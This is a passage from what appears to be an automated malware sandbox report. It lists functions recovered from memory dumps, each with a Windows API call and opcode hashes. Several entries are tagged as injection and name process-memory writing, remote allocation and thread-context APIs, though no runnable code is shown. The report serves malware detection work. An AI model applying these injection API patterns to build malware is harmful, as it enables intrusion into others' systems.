Instruction Fuzzy Hash: 5021C372500304AFFB21DF55DC45FAAFBACEF44750F14846AFE45DA641D634E9088A71

Uniqueness

Uniqueness Score: -1.00%

Function 003B0F46, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,EC15ECBD,00000000,00000000,00000000,00000000), ref: 003B0FC5

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: f3d396b6acc7e0628176334c250bab56a40c77e516bc9be9a5a931d03384e2b0
Instruction ID: bb1c01ab6cad1fe4344ff5a440d648aca3e35091679d3c082ee6dd54828a3311
Opcode Fuzzy Hash: f3d396b6acc7e0628176334c250bab56a40c77e516bc9be9a5a931d03384e2b0
Instruction Fuzzy Hash: 83219F72409384AFEB22CF51DC45F96BFB8EF45310F08849AEA449B192C235A948CB71

Uniqueness

Uniqueness Score: -1.00%

Function 003B114E, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000E40,EC15ECBD,00000000,00000000,00000000,00000000), ref: 003B11B8

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 5e516f5c314381831969c021510a239f30921ffe20fa7b5e350e40d27d338167
Instruction ID: 4dfa70682a103f6f8891fbbc514f6d5f52c428caf6cbcdb7917a01d7c823d597
Opcode Fuzzy Hash: 5e516f5c314381831969c021510a239f30921ffe20fa7b5e350e40d27d338167
Instruction Fuzzy Hash: 1511AF72500304EFEB21CF55DC85FABFBACEF04320F04856AFA05DA941D674A9448BB1

Uniqueness

Uniqueness Score: -1.00%

Function 001CAD5A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,EC15ECBD,00000000,00000000,00000000,00000000), ref: 001CADD4

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 4ea93071a61afaf54d18163b27f7d25159290189819c4cfd51f65abf8622978a
Instruction ID: 965fe7e0d281e4f2f532dac7dc28c9456dbac12c9c784c19066723ecedb3b647
Opcode Fuzzy Hash: 4ea93071a61afaf54d18163b27f7d25159290189819c4cfd51f65abf8622978a
Instruction Fuzzy Hash: E321CD72600708AFEB21CF51DC80FA2B7ECEF14715F48855AE9068B691D760E904CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 003B1BF0, Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003B1C70

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f3d0b7dc63e3546637b3d459e842c1ef6a9394dcb83edf857a3b7589f2bb03d5
Instruction ID: 701c42fdf82b1c2ef27695f89ba6aca446e61da37502d1e432d05f4aaa8689ad
Opcode Fuzzy Hash: f3d0b7dc63e3546637b3d459e842c1ef6a9394dcb83edf857a3b7589f2bb03d5
Instruction Fuzzy Hash: 1F21D0765083C09FEB228F21DC45A92FFB4EF07314F0A80DED9858B563D225A808DB21

Uniqueness

Uniqueness Score: -1.00%

Function 003B0006, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 003B0083

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 27c43a54ac2144709b3bc4fc44919b0bef204ae751c41232bafcda55d831cd17
Instruction ID: 6b480dd9b16443d9cb43077285d4783bceb5a91179e1aa66ba5b2ad32acee85d
Opcode Fuzzy Hash: 27c43a54ac2144709b3bc4fc44919b0bef204ae751c41232bafcda55d831cd17
Instruction Fuzzy Hash: 962150715087849FDB22CF65DC45B62BFF4EF06314F09849AE9858B663D375E808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001CB7C9, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 001CB845

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 95f784b499b13f2aceef9d1e8bb5b02c8f9978be3b1dce46d129b35be02def5c
Instruction ID: b2418f40166d41104860d30e86dc758de83bdd978c36018d2a536f5462dc0ba7
Opcode Fuzzy Hash: 95f784b499b13f2aceef9d1e8bb5b02c8f9978be3b1dce46d129b35be02def5c
Instruction Fuzzy Hash: D82190B55093809FE7228F15DC85B62BFA8EF16714F08809EED84CB253D365E808DB62

Uniqueness

Uniqueness Score: -1.00%

Function 003B1D51, Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 003B1DC5

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 59d9664a71dc719e10293e2bb4dafdaafd234cdb745fd50e1c125b3c4614c0c5
Instruction ID: 3de967ace115d8d2821d4e83b39252339d87f91f00aca2271b0347f224938e77
Opcode Fuzzy Hash: 59d9664a71dc719e10293e2bb4dafdaafd234cdb745fd50e1c125b3c4614c0c5
Instruction Fuzzy Hash: AB218C725093C09FDB238F25CC54A91BFB4EF17214F0984DAE9848B563D225A818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 001CA5FB, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 001CA666

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f611d74cbbbcc62f61f89d898249b69acdd4d54a98686752aa2245e5424b7d4c
Instruction ID: 3cebacf38cb2643119b61de31b65700cc2c44fb5f6baeaee322ec0171b00f8dd
Opcode Fuzzy Hash: f611d74cbbbcc62f61f89d898249b69acdd4d54a98686752aa2245e5424b7d4c
Instruction Fuzzy Hash: 99116071409780AFDB228F51DC44B62FFB4EF5A214F08849AED858B552D375A418DB61

Uniqueness

Uniqueness Score: -1.00%

Function 003B177C, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 003B17D8

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 2be8e6412aed4e194f20d320ca831295e6cf689170a88c8f223e73458f00a74a
Instruction ID: 5269d18cbbd5d8b6dcbe0d72f75850461cd5e27de1440c8ad5a1f5ce1be26330
Opcode Fuzzy Hash: 2be8e6412aed4e194f20d320ca831295e6cf689170a88c8f223e73458f00a74a
Instruction Fuzzy Hash: F211B2716093809FD712CF25DC95B92BFE8EF06224F0980EAED49CB652D275E808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003B0F66, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,EC15ECBD,00000000,00000000,00000000,00000000), ref: 003B0FC5

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 1976016ed6d04d4f77202d94ce390b3fcb5ac18da14c726ab346b4bd0331750e
Instruction ID: 6ccf0bae6382e4384123508ce850f840a62c4b39a6c56ba3904bc00f219db772
Opcode Fuzzy Hash: 1976016ed6d04d4f77202d94ce390b3fcb5ac18da14c726ab346b4bd0331750e
Instruction Fuzzy Hash: 7711E372500704EFEB21DF51DC45FA6FBA8EF04724F14846AEE099A541C675A948CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 001CB728, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

AddAtomW.KERNEL32(?), ref: 001CB788

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: Atom
String ID:
API String ID: 2154973765-0
Opcode ID: 9cf22c248082d4fdd5527acca8a8d74df8b53eafbd26f3d6e2410b5227b33118
Instruction ID: 356053e2d7d6cf93a66a0c78e2e76a0422e10a381eb5c79240ce88b40df71f3a
Opcode Fuzzy Hash: 9cf22c248082d4fdd5527acca8a8d74df8b53eafbd26f3d6e2410b5227b33118
Instruction Fuzzy Hash: 391163755093C09FD712CB25DC85B52BFA8EF56250F0884DAED84CF693D265E808C762

Uniqueness

Uniqueness Score: -1.00%

Function 003B1B4F, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003B1BB4

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0700b3425b115d5d11b89bb6e871c7fa70b4b2540dd4721c319fcf39498c7fb9
Instruction ID: d51fe89da20e27b098daeced9da5bd901d73479601c6f5385f13c2945f0338d8
Opcode Fuzzy Hash: 0700b3425b115d5d11b89bb6e871c7fa70b4b2540dd4721c319fcf39498c7fb9
Instruction Fuzzy Hash: A611E2765087809FDB228F11DC44A92FFB4EF06320F0884DEEE858B563D375A818DB61

Uniqueness

Uniqueness Score: -1.00%

Function 003B203F, Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 003B20A9

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8f31e48feaaebefa1bdc982074115bc2b9edde4b837cff85ef772cb8044ec7ce
Instruction ID: 4e6f170d1ef8aa6189b7fd30d4f56087c25208a6f97b24f26bc33ca984ce190b
Opcode Fuzzy Hash: 8f31e48feaaebefa1bdc982074115bc2b9edde4b837cff85ef772cb8044ec7ce
Instruction Fuzzy Hash: 8711D0715093849FDB228F11DC45B52FFB4EF06324F08809EEE854B563C276A818DB61

Uniqueness

Uniqueness Score: -1.00%

Function 003B1AA8, Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32 ref: 003B1B07

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ccffc9c673313c13ded1a7086241a57cfd2df3cd2aaa4df4d20061cae130ea4f
Instruction ID: 72c745d6d9bbb7584b12282720973c6257c71ffe0e19801622f06e92f0003df0
Opcode Fuzzy Hash: ccffc9c673313c13ded1a7086241a57cfd2df3cd2aaa4df4d20061cae130ea4f
Instruction Fuzzy Hash: 5B118F755093849FD712CF15DC85B92BFE8EF06224F0980AAED458B662D275E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001CA97B, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

LsaClose.ADVAPI32(?), ref: 001CA9DC

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 5ebe3a2a903d4f0e207e3c448e8603827338ebba11707ed1fa7a316231f6204d
Instruction ID: 583a80d1fefd401ac3cdb072dc735f27cb19dbfc1c34066e7b52c9da16344b7b
Opcode Fuzzy Hash: 5ebe3a2a903d4f0e207e3c448e8603827338ebba11707ed1fa7a316231f6204d
Instruction Fuzzy Hash: EC11BF714093C4AFDB12CF11DC45B92BFB4EF06264F0884DBED498B293D279A808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 003B0032, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 003B0083

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: e1391c3edf1ea830fbd902c678b1f78789c1dfa300d559aaba308d7c037e8070
Instruction ID: c4403ddf185b9d28c044dfa7af7aee1cd0bf36ad0730af25f3e600cb73c85b33
Opcode Fuzzy Hash: e1391c3edf1ea830fbd902c678b1f78789c1dfa300d559aaba308d7c037e8070
Instruction Fuzzy Hash: FD117C71500704DFEB21DF65D884BA3FBE8EF04714F0884AADE498BA52D375E804DB62

Uniqueness

Uniqueness Score: -1.00%

Function 003B0DD6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E40,EC15ECBD,00000000,00000000,00000000,00000000), ref: 003B0E29

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 14d239b9844c91866a6d2e897869b9499c1efcf50589a9addd82fa654c1eacc8
Instruction ID: d6f5097e9833f8130ca6b570aa8f414fb05c2a0da80c227dbf2807f7d9f0e98a
Opcode Fuzzy Hash: 14d239b9844c91866a6d2e897869b9499c1efcf50589a9addd82fa654c1eacc8
Instruction Fuzzy Hash: 9601C071500700EFFB218F11DC85BA7FB98EF04724F14849AEE089B681D674E904CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 003B1EC9, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 003B1F20

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DestroyWindow
String ID:
API String ID: 3375834691-0
Opcode ID: d7d50d1d854f6f0ad7326bdbc927103255ba9ccedbb541211098da32831fc9c2
Instruction ID: f30f0a954a686a62a667d19f3450431f37dd71289d26a8dcb3acf8289996c80a
Opcode Fuzzy Hash: d7d50d1d854f6f0ad7326bdbc927103255ba9ccedbb541211098da32831fc9c2
Instruction Fuzzy Hash: AC11A0765097809FD7128F25DC45B52BFA4EF06320F0980AAED898B663D365A808DB61

Uniqueness

Uniqueness Score: -1.00%

Function 001CAEF0, Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001CAF50

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0eea996467f88c1049652f47f349edf1de21f60fc9e1d07c2acb5405c12e3542
Instruction ID: 6dd703c1ce2aba3e0a75779802e24d0b192a7c6478deef2ce112707d83d0604a
Opcode Fuzzy Hash: 0eea996467f88c1049652f47f349edf1de21f60fc9e1d07c2acb5405c12e3542
Instruction Fuzzy Hash: 6C118F71404784AFDB228F11DC45F56FFB4EF15320F09849EE9858B662C375A418DB62

Uniqueness

Uniqueness Score: -1.00%

Function 001CA42A, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 001CA480

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: f524b1372ee6b1fd0660565d37f2d1b25705940da04ec8d6201136ed703c7f7d
Instruction ID: d2334df214210d700e026d072128261e8bfd8ec73d497828ff7e6021c433e1d1
Opcode Fuzzy Hash: f524b1372ee6b1fd0660565d37f2d1b25705940da04ec8d6201136ed703c7f7d
Instruction Fuzzy Hash: E201A171508384AFD7128B05DC48B62BFA8EF46324F08809AED844B252D375A808DB62

Uniqueness

Uniqueness Score: -1.00%

Function 003B1C2A, Relevance: 1.5, APIs: 1, Instructions: 47injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003B1C70

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ec820d8bd6f01b6ee8b29b31081e7a51ba2dbb9b6cda59f2e0ff214d6ec94821
Instruction ID: fb5198f549b770fe5f5414165c8cc371feac0282dacb58fb3c189e67e2fa6308
Opcode Fuzzy Hash: ec820d8bd6f01b6ee8b29b31081e7a51ba2dbb9b6cda59f2e0ff214d6ec94821
Instruction Fuzzy Hash: 4601AD76600700DFEB218F15D884BA2FFA8EF14324F0880AADE498BA51D375E808DA61

Uniqueness

Uniqueness Score: -1.00%

Function 003B179E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 003B17D8

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: bd36d82f1fe19ddd26fca4f13451d23086da5c0d7917fcb9357d018e6e015bbe
Instruction ID: d6bb0efd533762228c08cd87e2b301f23f4768231f4aac8156b332fa410c514c
Opcode Fuzzy Hash: bd36d82f1fe19ddd26fca4f13451d23086da5c0d7917fcb9357d018e6e015bbe
Instruction Fuzzy Hash: D6018C71A002409FEB11CF26D8857A6FBD8EF05724F58C0AADE09CBA42D674E804CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003B197A, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 003B19B4

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 73250c43b2f80f3bfe27a58b61c0649d68c9efcf0d0c50b590203b2499ef4d4f
Instruction ID: a60ac1d6c9c86783324149ddc1e7ad5cebac1b6453facc2819ef126eaa7c8dbd
Opcode Fuzzy Hash: 73250c43b2f80f3bfe27a58b61c0649d68c9efcf0d0c50b590203b2499ef4d4f
Instruction Fuzzy Hash: 9601B571A007409FEB11CF25DC957A6FBD8EF00724F4880AADD09CBA42D774E804CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001CB7FA, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 001CB845

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 9a3b82fbf9e0d6ac30eb6a56ad6679e6ca67ad440388aa6fcb185047db16651a
Instruction ID: f8e583af9411f33e1bb894a0c9255d771688afb26e6612d7bec5f3cf324c7b45
Opcode Fuzzy Hash: 9a3b82fbf9e0d6ac30eb6a56ad6679e6ca67ad440388aa6fcb185047db16651a
Instruction Fuzzy Hash: 21014C75504740DFEB60DF15D886B22FBE8EF24720F08809DDD49CB652D375E808DA62

Uniqueness

Uniqueness Score: -1.00%

Function 001CA622, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 001CA666

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7726c05067d23d1f0cf7e72c099bd40a3de3bb4a10ed22502fd6a6aa2a759d51
Instruction ID: abf96f36e9d72102ca09855b4647b4995c7c609b7cfd61eff663b0188825a013
Opcode Fuzzy Hash: 7726c05067d23d1f0cf7e72c099bd40a3de3bb4a10ed22502fd6a6aa2a759d51
Instruction Fuzzy Hash: 0201A972800744DFEB228F51D884B56FFE0EF18320F4888AEEE494A612D336E414DB62

Uniqueness

Uniqueness Score: -1.00%

Function 003B1ACA, Relevance: 1.5, APIs: 1, Instructions: 44threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32 ref: 003B1B07

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ea92b3a1c41b72dea6a42d9d3ecb5ba2d20f37acd4f68bc151220ad4e5098ac3
Instruction ID: 1478e56e5bd4a5b2646b1f28c087ddde675ba2c7bbfac6e89cfa4b75fb78db23
Opcode Fuzzy Hash: ea92b3a1c41b72dea6a42d9d3ecb5ba2d20f37acd4f68bc151220ad4e5098ac3
Instruction Fuzzy Hash: 1401D435604700CFEB11CF15D885BA1FBE8EF04324F48C0AADE098BA52E3B5E904DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 001CB74E, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

AddAtomW.KERNEL32(?), ref: 001CB788

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: Atom
String ID:
API String ID: 2154973765-0
Opcode ID: 5945eb017e2fe9f713f8bc4304560971ba6dda496ff80fd8ce9a3bdaa5859dc1
Instruction ID: 73b575cd8966a2a11788359aca263a639e08a4a13258754ef45bc8064e2c75d5
Opcode Fuzzy Hash: 5945eb017e2fe9f713f8bc4304560971ba6dda496ff80fd8ce9a3bdaa5859dc1
Instruction Fuzzy Hash: 9A017C75908740DFEB10CF55D886B62FB98EF64721F0884AEDD49CB382D779E804CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 003B1B76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003B1BB4

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 63e96e2a69c4fb4cad7ad1b18a384c38b2b4d4794d476a3fbc1af383f614b0b7
Instruction ID: a48ea0ec8e537fbc2949a5524230ca24e75cb2cd45e6dfa8f5beeae195b4d2e0
Opcode Fuzzy Hash: 63e96e2a69c4fb4cad7ad1b18a384c38b2b4d4794d476a3fbc1af383f614b0b7
Instruction Fuzzy Hash: 4A019E36504700DBEB218F55DC85BA5FBA4EF08324F0884AEDE494AA61D375E418DB62

Uniqueness

Uniqueness Score: -1.00%

Function 001CA2F6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 001CA346

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: a22c0a23ed504fee6b8f75feb69635a7f566a14687031a35ab009ec598a9acc4
Instruction ID: 6d8c8591a8254b19a157b68482082bbf968a968adf15498f1dd3f82f358aeef7
Opcode Fuzzy Hash: a22c0a23ed504fee6b8f75feb69635a7f566a14687031a35ab009ec598a9acc4
Instruction Fuzzy Hash: 72016D71900600ABE310DF16DC86B26FBA8FF88A20F14825AED085B741E275F915CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 003B206E, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 003B20A9

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 279b8ed57f2fa37af61c914f86d145435b74df267050995173268d76d1965f12
Instruction ID: b86165b55785787b1466ffa518a018b6c54149595f923f1c0748fbeb335131ee
Opcode Fuzzy Hash: 279b8ed57f2fa37af61c914f86d145435b74df267050995173268d76d1965f12
Instruction Fuzzy Hash: 4501D431500740DFEB219F15DC84B66FBA4EF14324F08C19EDE494BA61D275E458DB62

Uniqueness

Uniqueness Score: -1.00%

Function 003B1EEE, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 003B1F20

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: DestroyWindow
String ID:
API String ID: 3375834691-0
Opcode ID: d7bd163d180b0d0bc8286556c311d0dda2bce46ad2ccd4dba354681328b151eb
Instruction ID: c66e20c5d74025bbb53b5187f87938e366ac7161c4f3a11534722ebbdeb43ddb
Opcode Fuzzy Hash: d7bd163d180b0d0bc8286556c311d0dda2bce46ad2ccd4dba354681328b151eb
Instruction Fuzzy Hash: 5D01F475604740CFEB218F15DC857A2FBA4EF05724F08C1AADE098BB52D375E808DA62

Uniqueness

Uniqueness Score: -1.00%

Function 001CAF12, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001CAF50

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 90f3d6db4da11aed4fdfdf562280ea7fd2de81c7d877b425172a4d521aa4d72d
Instruction ID: 69626c1afa97cc02c2033fa147a1a41be654263d4545fb6a74201cc041d5bd76
Opcode Fuzzy Hash: 90f3d6db4da11aed4fdfdf562280ea7fd2de81c7d877b425172a4d521aa4d72d
Instruction Fuzzy Hash: 7E018F71400704DFEB218F45D885F65FFA0EF18724F48849EDD494A622D375E418DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 001CA9AA, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

LsaClose.ADVAPI32(?), ref: 001CA9DC

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: f606c13766afd6c896b982e2fb4c4faffb8cb9cf9d002479ad7c85e90490a7c9
Instruction ID: 040000d54d6a6f4edfb47f5b07dab811b9a1c70d9d408dbe2b3a9e64b351309f
Opcode Fuzzy Hash: f606c13766afd6c896b982e2fb4c4faffb8cb9cf9d002479ad7c85e90490a7c9
Instruction Fuzzy Hash: 1101AD71804344DFEB21CF15D989BA5FFA4EF14324F48C4AADD098B242D379E444DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 003B1D8A, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 003B1DC5

Memory Dump Source

Source File: 00000018.00000002.2227556447.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 38d7891fec03bccaf99a5e02e1c5e80186fdb808e35b48dc99616aad2158949d
Instruction ID: c616c5591c5f28ddbce56e2da4d41dbb17cb2d67c18d6ee90edb83f8df271abc
Opcode Fuzzy Hash: 38d7891fec03bccaf99a5e02e1c5e80186fdb808e35b48dc99616aad2158949d
Instruction Fuzzy Hash: 9901AD32400740DFEB218F46D884BA2FFA4EF18325F48C09EDE490BA12D375A418DB62

Uniqueness

Uniqueness Score: -1.00%

Function 001CA44E, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 001CA480

Memory Dump Source

Source File: 00000018.00000002.2227124969.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 05238b8b369cf8e6b4234c3da368df70247399ff65fc93b67ecf1ce929ba10b9
Instruction ID: ce542af57577f202625bf89a0a308cb5ecf2b1d70bd630fec28beb0a267b74e3
Opcode Fuzzy Hash: 05238b8b369cf8e6b4234c3da368df70247399ff65fc93b67ecf1ce929ba10b9
